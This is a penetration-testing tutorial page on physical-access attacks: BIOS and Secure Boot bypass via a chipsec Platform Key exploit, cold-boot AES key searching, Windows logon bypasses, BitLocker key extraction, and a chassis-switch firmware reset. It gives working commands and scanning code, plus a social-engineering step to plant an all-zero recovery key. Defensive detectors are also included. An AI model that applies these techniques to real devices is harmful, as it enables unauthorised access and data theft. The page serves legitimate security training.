Physical Attacks

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

BIOS Password Recovery and System Security

Resetting the BIOS can be achieved in several ways. On most desktop motherboards, removing the CMOS battery for around 30 minutes clears the stored settings, including the password; alternatively, a clear-CMOS jumper on the board can be shorted to do the same. Note that many laptops and business desktops keep the supervisor password in non-volatile EEPROM/flash (sometimes inside the Embedded Controller) rather than in battery-backed CMOS, so on those machines neither trick clears it.

Where hardware changes are not possible or practical, software tools offer a partial solution. Booting the system from a Live CD/USB such as Kali Linux gives access to tools like killCmos and CmosPWD, which clear or recover BIOS passwords stored in CMOS; they only help on systems that actually keep the password there.

If the BIOS password is unknown, entering it wrongly three times on many laptop models produces an error/hash code bound to that machine. Submitting the code to a site such as https://bios-pw.org yields a vendor master password for the matching algorithm, which may be accepted; not all vendors or current models use such a scheme.

UEFI Security

For modern systems that boot via UEFI rather than legacy BIOS, chipsec can inspect and modify firmware state, including the Secure Boot variables. Its exploits.secure.boot.pk module attempts to replace the Platform Key (PK) with one the attacker controls; if the firmware does not enforce authenticated writes on PK, the write succeeds and the root of Secure Boot's chain of trust is attacker-controlled. Run it from a booted OS as root with the chipsec kernel driver loaded:

```bash
python chipsec_main.py -m exploits.secure.boot.pk
```
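Before running the chipsec module it is worth reading the relevant UEFI variables yourself. The following is an added example for this page, not chipsec's own code: it parses efivarfs files (a 4-byte attribute word followed by the data), reports whether Secure Boot is enforcing, whether the firmware is in Setup Mode, and whether PK carries the time-based authenticated-write attribute. The sample variable contents are constructed. A PK without that attribute, or no PK at all, is the condition the exploits.secure.boot.pk module relies on; a correctly attributed PK can still be overwritten by buggy firmware, which is why chipsec tries the write rather than only reading attributes.

```python
"""Pre-check of the Secure Boot state from Linux (for example a Kali live USB)
before running chipsec.  Added example for this page, not chipsec's own code.

efivarfs (/sys/firmware/efi/efivars) exposes each UEFI variable as one file:
a little-endian uint32 of attribute flags followed by the variable data.
"""
import struct
from pathlib import Path

# Attribute flags from the UEFI specification.
EFI_VARIABLE_NON_VOLATILE = 0x01
EFI_VARIABLE_BOOTSERVICE_ACCESS = 0x02
EFI_VARIABLE_RUNTIME_ACCESS = 0x04
EFI_VARIABLE_TIME_BASED_AUTHENTICATED_WRITE_ACCESS = 0x20

EFI_GLOBAL_VARIABLE = "8be4df61-93ca-11d2-aa0d-00e098032b8c"
EFIVARS = Path("/sys/firmware/efi/efivars")


def parse_efivar(raw: bytes):
    """Split an efivarfs file body into (attributes, data)."""
    if len(raw) < 4:
        raise ValueError("efivar blob shorter than its 4-byte attribute word")
    (attrs,) = struct.unpack("<I", raw[:4])
    return attrs, raw[4:]


def flag_is_set(raw):
    """SecureBoot and SetupMode are one-byte booleans (1 = true); a missing
    variable counts as false."""
    if raw is None:
        return False
    _, data = parse_efivar(raw)
    return len(data) >= 1 and data[0] == 1


def assess(secureboot_raw, setupmode_raw, pk_raw) -> dict:
    """Summarise what matters before deciding to attack the Platform Key."""
    pk_attrs, pk_data = parse_efivar(pk_raw) if pk_raw is not None else (0, b"")
    enforcing = flag_is_set(secureboot_raw)
    setup_mode = flag_is_set(setupmode_raw)
    pk_authenticated = bool(pk_attrs & EFI_VARIABLE_TIME_BASED_AUTHENTICATED_WRITE_ACCESS)
    if not enforcing:
        verdict = "boot_own_media"   # nothing to bypass, boot the live USB
    elif setup_mode or not pk_data or not pk_authenticated:
        verdict = "pk_unprotected"   # the situation exploits.secure.boot.pk abuses
    else:
        verdict = "hardened"         # attributes look right; chipsec's write attempt is the real test
    return {
        "secure_boot_enforcing": enforcing,
        "setup_mode": setup_mode,
        "pk_present": bool(pk_data),
        "pk_authenticated_write": pk_authenticated,
        "verdict": verdict,
    }


def read_var(name: str, guid: str = EFI_GLOBAL_VARIABLE):
    """Raw efivarfs contents of a variable, or None if it does not exist."""
    path = EFIVARS / f"{name}-{guid}"
    return path.read_bytes() if path.is_file() else None


# Constructed variable contents for offline use (attrs BS|RT = 0x06,
# NV|BS|RT = 0x07, plus the authenticated-write flag = 0x27).
SAMPLE_SB_ON = struct.pack("<I", 0x06) + b"\x01"
SAMPLE_SB_OFF = struct.pack("<I", 0x06) + b"\x00"
SAMPLE_SETUP_OFF = struct.pack("<I", 0x06) + b"\x00"
SAMPLE_PK_AUTH = struct.pack("<I", 0x27) + b"\xa5" * 32
SAMPLE_PK_NOAUTH = struct.pack("<I", 0x07) + b"\xa5" * 32

if __name__ == "__main__":
    if EFIVARS.is_dir():   # booted in UEFI mode: read the live variables
        print(assess(read_var("SecureBoot"), read_var("SetupMode"), read_var("PK")))
    else:
        print(assess(SAMPLE_SB_ON, SAMPLE_SETUP_OFF, SAMPLE_PK_NOAUTH))
```

The verdict is only a triage aid: "boot_own_media" means Secure Boot is off and no firmware attack is needed, "pk_unprotected" means the PK write is likely to succeed, and "hardened" means the attribute checks pass, which does not rule out an implementation bug that chipsec's actual write attempt would expose.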

RAM Analysis and Cold Boot Attacks

RAM retains its contents for a short time after power is cut, typically on the order of a minute or two at room temperature; cooling the modules (freeze spray, liquid nitrogen) stretches this to ten minutes or more. Within that window the machine can be rebooted into a minimal imaging environment, or the DIMMs moved to another box, and memory dumped with tools like dd.exe and analysed with Volatility to recover disk-encryption keys and other secrets. Firmware that honours the TCG memory-overwrite request (MOR) scrubs RAM on reset, which is one reason the modules are often moved to a different machine for the dump.
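What "analysis" of a cold-boot image usually means in practice is finding the disk-encryption key, and AES keys are located by spotting their expanded key schedule in memory. The block below is an added example for this page (not aeskeyfind or Volatility code): it implements AES-128 key expansion and scans an image for schedules, with an error budget for decayed bytes. The image it scans is constructed, and the planted key is the FIPS-197 test-vector key.

```python
"""Search a memory image for AES-128 key schedules, the approach aeskeyfind
uses on cold-boot dumps.  Added example for this page, not aeskeyfind itself;
the memory image is constructed.

A key in use sits in RAM as its expanded schedule: 11 round keys, 176 bytes,
the original key being the first 16.  Treat every 16-byte window as a
candidate key, expand it, and check whether the next 160 bytes are what the
expansion predicts.  Random data never passes; a live schedule does.
"""
import random


def _build_sbox():
    """AES S-box (FIPS-197 5.1.1): GF(2^8) inverse, then the affine map.
    p walks the powers of 3, q the powers of 1/3, so p*q == 1 throughout."""
    sbox = [0] * 256
    p = q = 1
    while True:
        p = (p ^ (p << 1) ^ (0x1B if p & 0x80 else 0)) & 0xFF   # p *= 3
        q ^= (q << 1) & 0xFF                                    # q /= 3 (times 0xF6)
        q ^= (q << 2) & 0xFF
        q ^= (q << 4) & 0xFF
        if q & 0x80:
            q ^= 0x09
        rot = lambda v, n: ((v << n) | (v >> (8 - n))) & 0xFF
        sbox[p] = q ^ rot(q, 1) ^ rot(q, 2) ^ rot(q, 3) ^ rot(q, 4) ^ 0x63
        if p == 1:
            break
    sbox[0] = 0x63   # zero has no inverse; the affine map sends 0 to 0x63
    return sbox


SBOX = _build_sbox()


def _schedule_words(key: bytes):
    """Yield the 44 four-byte words of the AES-128 key schedule, lazily."""
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    yield from w
    rcon = 1
    for i in range(4, 44):
        t = list(w[i - 1])
        if i % 4 == 0:                               # every 4th word: RotWord, SubWord, Rcon
            t = [SBOX[b] for b in t[1:] + t[:1]]
            t[0] ^= rcon
            rcon = ((rcon << 1) ^ (0x1B if rcon & 0x80 else 0)) & 0xFF
        w.append([a ^ b for a, b in zip(w[i - 4], t)])
        yield w[-1]


def expand_key(key: bytes) -> bytes:
    """16-byte key -> 176-byte round-key schedule."""
    return bytes(b for word in _schedule_words(key) for b in word)


def schedule_matches(image: bytes, off: int, max_errors: int = 0) -> bool:
    """Does image[off:off+176] look like the expansion of image[off:off+16]?
    Compared word by word and abandoned once more than max_errors bytes
    disagree, so most offsets cost one word.  The tolerance covers decayed
    bytes in the expanded part only; the 16 key bytes themselves must be intact."""
    if off + 176 > len(image):
        return False
    errors = 0
    for i, word in enumerate(_schedule_words(image[off:off + 16])):
        if i < 4:
            continue
        actual = image[off + 4 * i:off + 4 * i + 4]
        errors += sum(a != b for a, b in zip(word, actual))
        if errors > max_errors:
            return False
    return True


def find_aes128_keys(image: bytes, max_errors: int = 0):
    """[(offset, key)] for every schedule found in the image."""
    return [(off, image[off:off + 16])
            for off in range(len(image) - 175)
            if schedule_matches(image, off, max_errors)]


FIPS197_KEY = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")


def build_sample_image(key: bytes = FIPS197_KEY, at: int = 1000, damaged_bytes: int = 0) -> bytes:
    """Constructed 'dump': 4 KiB of pseudo-random filler with one live schedule
    planted at `at`; damaged_bytes single-bit flips in the expanded part mimic decay."""
    rng = random.Random(7)
    image = bytearray(rng.getrandbits(8) for _ in range(4096))
    schedule = bytearray(expand_key(key))
    for k in range(damaged_bytes):
        schedule[40 + 7 * k] ^= 0x01
    image[at:at + 176] = schedule
    return bytes(image)


if __name__ == "__main__":
    for off, key in find_aes128_keys(build_sample_image(damaged_bytes=1), max_errors=4):
        print(f"AES-128 key schedule at 0x{off:x}: {key.hex()}")
```

On a real dump, run find_aes128_keys over the image with a small max_errors and treat every hit as a candidate volume key; the same idea extends to AES-256 (240-byte schedule) and, with a different predictor, to RSA private keys.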


Direct Memory Access (DMA) Attacks

Inception is a tool for manipulating physical memory over DMA through FireWire, Thunderbolt, ExpressCard/PCMCIA and similar interfaces. It patches the OS's password-verification routine in RAM so that any password is accepted at the login prompt. It has no signatures for Windows 10, and more generally it fails on systems where the IOMMU is enabled for external ports (e.g. Windows Kernel DMA Protection), which stops an untrusted peripheral from reading or writing arbitrary memory.


Live CD/USB for System Access

From a Live CD/USB, replacing accessibility binaries such as sethc.exe (Sticky Keys) or Utilman.exe with a copy of cmd.exe gives a command prompt running as SYSTEM on the logon screen: press Shift five times, or click the Ease of Access button, before logging in. Offline, chntpw can edit the SAM hive (Windows\System32\config\SAM) to blank or change a local account's password. Both require the system volume to be unencrypted or already unlocked, and the swap is trivially detected by comparing the file against cmd.exe.
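A defender-side check for the swap described above, as an added example that is not from the original page or from chntpw/Kali: hash the logon-screen accessibility helpers and flag any that is a byte-for-byte copy of cmd.exe or powershell.exe. The directory tree in demo() is constructed; on a real host point find_swapped_binaries at C:\Windows\System32.

```python
"""Detect the 'accessibility binary swapped for cmd.exe' backdoor by hashing.
Added example for this page, not from any tool on it; demo() builds a
constructed System32 look-alike in a temp dir instead of touching the real one.
"""
import hashlib
import tempfile
from pathlib import Path

# Helpers launchable from the logon screen; sethc.exe and Utilman.exe are the
# classic targets, the others are the same trick with a different trigger.
ACCESSIBILITY_BINARIES = ("sethc.exe", "Utilman.exe", "osk.exe",
                          "Narrator.exe", "Magnify.exe", "DisplaySwitch.exe")
SHELLS = ("cmd.exe", "powershell.exe")


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def find_swapped_binaries(system32: Path) -> dict:
    """Map accessibility binary -> shell it is a byte-for-byte copy of."""
    shell_hashes = {sha256_of(system32 / s): s
                    for s in SHELLS if (system32 / s).is_file()}
    if not shell_hashes:
        raise FileNotFoundError(f"no shell binaries under {system32}")
    hits = {}
    for name in ACCESSIBILITY_BINARIES:
        p = system32 / name
        if p.is_file():
            digest = sha256_of(p)
            if digest in shell_hashes:
                hits[name] = shell_hashes[digest]
    return hits


def demo() -> dict:
    """Constructed tree: sethc.exe replaced by cmd.exe, Utilman.exe untouched."""
    with tempfile.TemporaryDirectory() as tmp:
        s32 = Path(tmp) / "Windows" / "System32"
        s32.mkdir(parents=True)
        (s32 / "cmd.exe").write_bytes(b"MZ fake cmd.exe body")
        (s32 / "powershell.exe").write_bytes(b"MZ fake powershell body")
        (s32 / "sethc.exe").write_bytes(b"MZ fake cmd.exe body")     # backdoored copy
        (s32 / "Utilman.exe").write_bytes(b"MZ fake utilman body")   # legitimate
        return find_swapped_binaries(s32)


if __name__ == "__main__":
    real = Path(r"C:\Windows\System32")
    print(find_swapped_binaries(real) if real.is_dir() else demo())
```

This catches only the naive copy; a renamed third-party shell or a custom launcher dropped in place of sethc.exe needs an Authenticode signature check against the expected Microsoft-signed binary instead.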

Kon-Boot lets you log in to Windows without knowing the password by patching the kernel's authentication check in memory at boot, either from the legacy boot path or via its UEFI loader; nothing is written to disk, so the change is gone after the next normal reboot. It requires Secure Boot to be disabled and an unencrypted system volume. More information can be found at https://www.raymond.cc.


Handling Windows Security Features

Boot and Recovery Shortcuts

  • Del (labelled Supr on Spanish keyboards): enter BIOS/UEFI setup (vendors also use F2, F10, F12 or Esc).
  • F8: Advanced Boot Options / Safe Mode on legacy boots; on Windows 8 and later the F8 menu is off by default and must be re-enabled through the boot menu policy.
  • Holding Shift while Windows starts (after the boot banner) skips a configured autologon and shows the logon screen.

BAD USB Devices

Devices like the USB Rubber Ducky and Teensy boards (programmed with Teensyduino) enumerate as a keyboard (HID), so the host accepts them without a driver prompt, and they type a predefined payload the moment they are plugged in.

Volume Shadow Copy

With administrator privileges, a Volume Shadow Copy of the system drive can be created (for example through the Win32_ShadowCopy WMI class from PowerShell), and locked files such as the SAM and SYSTEM hives copied out of the snapshot; the SYSTEM hive supplies the boot key needed to decrypt the hashes in SAM.


Bypassing BitLocker Encryption

BitLocker can be bypassed when its keys can be pulled from a memory image: a crash dump (MEMORY.DMP), a hibernation file, or a cold-boot/DMA dump taken while the volume was mounted holds the volume master key or full-volume encryption key, and sometimes the recovery password itself. Elcomsoft Forensic Disk Decryptor and Passware Kit Forensic automate extracting the key from such images and mounting the volume with it.


Social Engineering for Recovery Key Addition

Social engineering: convince a user with admin rights on the machine to run a command that adds a recovery-password protector consisting entirely of zeros. The all-zero password passes BitLocker's per-group checksum (each 6-digit group must be a multiple of 11 below 720896), so the volume can later be unlocked with that known password without guessing anything.
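The following serves both this paragraph and the memory-dump case above. It is an added example, not code from Elcomsoft, Passware or Microsoft: it encodes the recovery-password format (eight 6-digit groups, each a 16-bit value times 11), shows that the all-zero password is valid, converts a password to its 16-byte key material, and sweeps a constructed memory image for recovery-password candidates stored as ASCII or UTF-16LE. The dump and the sample password are constructed.

```python
"""BitLocker numerical recovery passwords: validity check, conversion to key
material, and a sweep through a memory image for candidates.  Added example for
this page (not Elcomsoft's, Passware's or Microsoft's code); the dump is
constructed.

A recovery password is 8 groups of 6 digits.  Each group is a 16-bit value
times 11, so it must be divisible by 11 and below 720896 (2**16 * 11); that
multiplication is the whole checksum.  Eight zero groups pass it, which is why
the "add a recovery key of zeros" trick yields a protector that works.
"""
import random
import re

GROUP_LIMIT = 2 ** 16 * 11                                          # 720896
ASCII_RE = re.compile(rb"(?:\d{6}-){7}\d{6}")
UTF16_RE = re.compile(rb"(?:(?:\d\x00){6}-\x00){7}(?:\d\x00){6}")   # UTF-16LE, how Windows holds strings


def group_is_valid(group: str) -> bool:
    return (len(group) == 6 and group.isdigit()
            and int(group) % 11 == 0 and int(group) < GROUP_LIMIT)


def recovery_password_is_valid(pw: str) -> bool:
    groups = pw.split("-")
    return len(groups) == 8 and all(group_is_valid(g) for g in groups)


def recovery_password_to_key(pw: str) -> bytes:
    """Each group // 11 as a little-endian 16-bit value: the 16 bytes BitLocker
    then stretches to derive the key that unwraps the volume master key."""
    return b"".join((int(g) // 11).to_bytes(2, "little") for g in pw.split("-"))


def key_to_recovery_password(key: bytes) -> str:
    """Inverse of the above; used here to mint valid passwords for the sample."""
    vals = [int.from_bytes(key[i:i + 2], "little") for i in range(0, 16, 2)]
    return "-".join(f"{v * 11:06d}" for v in vals)


def scan_dump(dump: bytes):
    """[(offset, encoding, password)] for every well-formed, checksum-valid
    recovery password in the dump, ASCII or UTF-16LE, in offset order."""
    hits = []
    for regex, codec in ((ASCII_RE, "ascii"), (UTF16_RE, "utf-16-le")):
        for m in regex.finditer(dump):
            pw = m.group().decode(codec)
            if recovery_password_is_valid(pw):
                hits.append((m.start(), codec, pw))
    return sorted(hits)


ZERO_PASSWORD = "-".join(["000000"] * 8)
SAMPLE_KEY = bytes(random.Random(2024).getrandbits(8) for _ in range(16))   # constructed
SAMPLE_PASSWORD = key_to_recovery_password(SAMPLE_KEY)


def build_sample_dump() -> bytes:
    """Constructed 'MEMORY.DMP': random filler, the sample password once as
    ASCII and once as UTF-16LE, plus a 48-digit string of the right shape that
    fails the divisibility rule."""
    rng = random.Random(1)
    junk = lambda n: bytes(rng.getrandbits(8) for _ in range(n))
    bogus = "-".join(["123456"] * 8)
    return (junk(300) + b"RecoveryPassword=" + SAMPLE_PASSWORD.encode() + junk(200)
            + bogus.encode() + junk(200) + SAMPLE_PASSWORD.encode("utf-16-le") + junk(100))


if __name__ == "__main__":
    for off, codec, pw in scan_dump(build_sample_dump()):
        print(f"0x{off:06x} {codec:9} {pw}  key={recovery_password_to_key(pw).hex()}")
    print("all-zero password valid:", recovery_password_is_valid(ZERO_PASSWORD))
```

The checksum filter matters on a real dump: 48-digit runs are common in memory (GUIDs, timestamps, counters), and only candidates whose eight groups all satisfy the multiple-of-11 rule are worth trying against the volume.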


Exploiting Chassis Intrusion / Maintenance Switches to Factory-Reset the BIOS

Many modern laptops and small-form-factor desktops include a chassis-intrusion switch that is monitored by the Embedded Controller (EC) and the BIOS/UEFI firmware. While the primary purpose of the switch is to raise an alert when a device is opened, vendors sometimes implement an undocumented recovery shortcut that is triggered when the switch is toggled in a specific pattern.

How the Attack Works

  1. The switch is wired to a GPIO interrupt on the EC.
  2. Firmware running on the EC keeps track of the timing and number of presses.
  3. When a hard-coded pattern is recognised, the EC invokes a mainboard-reset routine that erases the contents of the system NVRAM/CMOS.
  4. On next boot, the BIOS loads default values – supervisor password, Secure Boot keys, and all custom configuration are cleared.

Once Secure Boot is disabled and the firmware password is gone, the attacker can simply boot any external OS image and obtain unrestricted access to the internal drives.

Real-World Example – Framework 13 Laptop

The recovery shortcut for the Framework 13 (11th/12th/13th-gen) is:

```text
Press intrusion switch  →  hold 2 s
Release                 →  wait 2 s
(repeat the press/release cycle 10× while the machine is powered)
```

After the tenth cycle the EC sets a flag that instructs the BIOS to wipe NVRAM at the next reboot. The whole procedure takes ~40 s and requires nothing but a screwdriver.

Generic Exploitation Procedure

  1. Power-on or suspend-resume the target so the EC is running.
  2. Remove the bottom cover to expose the intrusion/maintenance switch.
  3. Reproduce the vendor-specific toggle pattern (consult documentation, forums, or reverse-engineer the EC firmware).
  4. Re-assemble and reboot – firmware protections should be disabled.
  5. Boot a live USB (e.g. Kali Linux) and perform usual post-exploitation (credential dumping, data exfiltration, implanting malicious EFI binaries, etc.).

Detection & Mitigation

  • Log chassis-intrusion events in the OS management console and correlate with unexpected BIOS resets.
  • Employ tamper-evident seals on screws/covers to detect opening.
  • Keep devices in physically controlled areas; assume that physical access equals full compromise.
  • Where available, disable the vendor “maintenance switch reset” feature or require an additional cryptographic authorisation for NVRAM resets.
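The first mitigation bullet above turned into code, as an added example that is not from the original page: it parses intrusion and firmware events per host and flags a firmware reset or Secure Boot change that follows a chassis-intrusion event, as well as resets with no intrusion on record (switch bypassed, or a logging gap). The log format and the lines are constructed for a hypothetical endpoint-management agent, and the 24-hour window is an assumption.

```python
"""Correlate chassis-intrusion events with firmware resets.  Added example for
this page; the log format and the lines are constructed (a hypothetical
endpoint-management agent), not any vendor's real schema.
"""
import re
from datetime import datetime, timedelta

LINE_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) event=(?P<event>\S+)")
RESET_EVENTS = {"firmware_settings_reset", "secure_boot_disabled",
                "supervisor_password_cleared"}
WINDOW = timedelta(hours=24)   # assumed: how long after opening the case a reset counts as related

# Constructed sample: lt-0042 shows the attack in this section, lt-0099 a reset
# with no intrusion on record, lt-0017 an opening with a reset days later.
SAMPLE_LOG = """\
2024-05-06T08:01:10Z host=lt-0042 event=chassis_intrusion
2024-05-06T08:03:55Z host=lt-0042 event=firmware_settings_reset
2024-05-06T08:04:30Z host=lt-0042 event=secure_boot_disabled
2024-05-06T09:15:00Z host=lt-0017 event=chassis_intrusion
2024-05-07T11:00:00Z host=lt-0099 event=firmware_settings_reset
2024-05-09T12:00:00Z host=lt-0017 event=firmware_settings_reset
"""


def parse(lines):
    """Yield (timestamp, host, event) for each well-formed line; skip the rest."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
            yield ts, m["host"], m["event"]


def correlate(lines, window=WINDOW):
    """Return (host, finding, event, timestamp) tuples:
       intrusion_then_reset    reset within `window` after the case was opened
       reset_without_intrusion reset with no intrusion in the window (bypass or logging gap)
       intrusion_only          case opened, nothing else seen yet
    """
    last_intrusion = {}
    findings = []
    for ts, host, ev in sorted(parse(lines)):
        if ev == "chassis_intrusion":
            last_intrusion[host] = ts
        elif ev in RESET_EVENTS:
            prev = last_intrusion.get(host)
            if prev is not None and ts - prev <= window:
                findings.append((host, "intrusion_then_reset", ev, ts))
            else:
                findings.append((host, "reset_without_intrusion", ev, ts))
    for host, ts in last_intrusion.items():
        if not any(f[0] == host and f[1] == "intrusion_then_reset" for f in findings):
            findings.append((host, "intrusion_only", "chassis_intrusion", ts))
    return findings


if __name__ == "__main__":
    for host, finding, ev, ts in correlate(SAMPLE_LOG.splitlines()):
        print(f"{ts:%Y-%m-%d %H:%M} {host:8} {finding:24} {ev}")
```

A reset without a matching intrusion event is the more interesting alert in practice: it means either the switch was defeated or the intrusion log never reached the console, and both deserve a look at the device.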
